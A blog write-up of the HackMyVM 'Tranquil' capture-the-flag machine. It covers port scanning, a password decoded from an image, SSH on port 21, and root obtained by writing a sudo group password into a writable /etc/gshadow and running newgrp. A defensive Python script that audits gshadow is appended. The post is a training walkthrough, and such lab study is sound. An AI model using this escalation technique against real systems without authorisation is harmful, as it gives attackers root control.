Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Tranquil Walkthrough

Key points: multiple services multiplexed on one port, and a writable gshadow.

Scan the ports: only 21 is open and it allows anonymous login, which is very strange.

 nmap -sV -sC -p- -oN ports.log
 Nmap scan report for deathnote.vuln (
 Host is up (0.00076s latency).
 Not shown: 65534 closed ports
 21/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 |_ftp-bounce: ERROR: Script execution failed (use -d to debug)
 | ssh-hostkey:
 |   3072 0e:03:3b:78:00:29:1d:ba:60:86:0e:d3:bb:7e:3c:04 (RSA)
 |   256 2a:47:4d:9c:ce:07:61:ca:f0:ca:58:8b:5b:0f:d4:db (ECDSA)
 |_  256 6c:42:50:a5:60:e9:0f:37:0f:be:ec:d1:20:74:29:9c (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check port 21 with curl.

 ~ curl                                                                                                         fish-0 | 0 [14:06:46]
 <img src="tranquil.jpg">
 <!-- We are one, humans, computers and ports.
 - guru -->

Gobuster enumerated files and folders but found nothing.

Download tranquil.jpg; there is a strange coloured-square coding on the left side.

Google "color squares coding" and decode it at the site: then we get a string.

When we use nc to check port 21, we can see OpenSSH is running on this port.

 ~ nc 21                                                                                                                   fish-0 | 0 [14:14:14]
 SSH-2.0-OpenSSH_8.4p1 Debian-5
 Invalid SSH identification string.

Log in with the username guru and the password we got.

 ~ ssh guru@ -p 21                                                                                                        fish-0 | 130 [14:12:56]
 The authenticity of host '[]:21 ([]:21)' can't be established.               ...

Search for writable files; /etc/gshadow is among them.

 guru@tranquil:~$ find / -writable -not -path "/proc*" 2>/dev/null

Generate a password hash.

 guru@tranquil:~$ openssl passwd mypass

Add the password hash to the sudo group's password field (the second field of the `sudo:` line) in /etc/gshadow.

 guru@tranquil:~$ cat /etc/gshadow  
 root:*::                                                                                                 ...

Use newgrp to switch guru's group to sudo, entering the password we set. Then check sudo again.

 guru@tranquil:~$ newgrp sudo
 guru@tranquil:~$ sudo -l
 [sudo] password for guru:
 Matching Defaults entries for guru on tranquil:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User guru may run the following commands on tranquil:
     (ALL : ALL) ALL                    
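A small audit script for the weakness this box relies on, added here as an example (it is not from the original post or the Tranquil VM): it parses a constructed gshadow sample, flags groups whose password field holds a hash that newgrp would accept (the privileged group names are an assumed list), and checks that the file's ownership and mode would not let a normal user edit it.

```python
"""Audit /etc/gshadow for group passwords that newgrp could use to join a
privileged group, and for permissions that let non-root users edit the file.
Added example, not from the original post."""
import os
import stat

# Groups whose membership is effectively root-equivalent; this set is an
# assumption, extend it for your distribution.
PRIVILEGED_GROUPS = {"sudo", "wheel", "admin", "root", "docker", "shadow"}

def parse_gshadow(text):
    """Return one dict per gshadow line (group:password:admins:members)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            continue  # malformed line: skip rather than guess
        name, password, admins, members = fields
        entries.append({"group": name, "password": password,
                        "admins": [a for a in admins.split(",") if a],
                        "members": [m for m in members.split(",") if m]})
    return entries

def usable_group_password(password):
    """True when the field holds a hash newgrp would accept.
    Empty, '*' and anything starting with '!' lock the group password."""
    return password not in ("", "*") and not password.startswith("!")

def find_group_password_risks(text):
    """Flag groups with a usable password; privileged ones are 'high'."""
    findings = []
    for e in parse_gshadow(text):
        if usable_group_password(e["password"]):
            sev = "high" if e["group"] in PRIVILEGED_GROUPS else "medium"
            findings.append((e["group"], sev))
    return findings

def gshadow_perms_ok(st_uid, st_mode):
    """Owner must be root and neither group nor others may write
    (on Debian the file is root:shadow, mode 0640)."""
    return st_uid == 0 and not (st_mode & (stat.S_IWGRP | stat.S_IWOTH))

# Constructed sample: a locked root group and a sudo group that someone gave
# a password hash (the hash value is a placeholder, not a real hash).
SAMPLE_GSHADOW = "root:*::\nsudo:$1$placeholder$notarealhash:root:\ndocker:!::\nusers:*::guru\n"

if __name__ == "__main__":
    st = os.stat("/etc/gshadow")
    print("permissions ok:", gshadow_perms_ok(st.st_uid, st.st_mode))
    for group, sev in find_group_password_risks(open("/etc/gshadow").read()):
        print(f"[{sev}] group {group} has a usable password set")
```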

Then we can become root.

 guru@tranquil:~$ sudo su
 root@tranquil:/home/guru# id;hostname
 uid=0(root) gid=0(root) groups=0(root)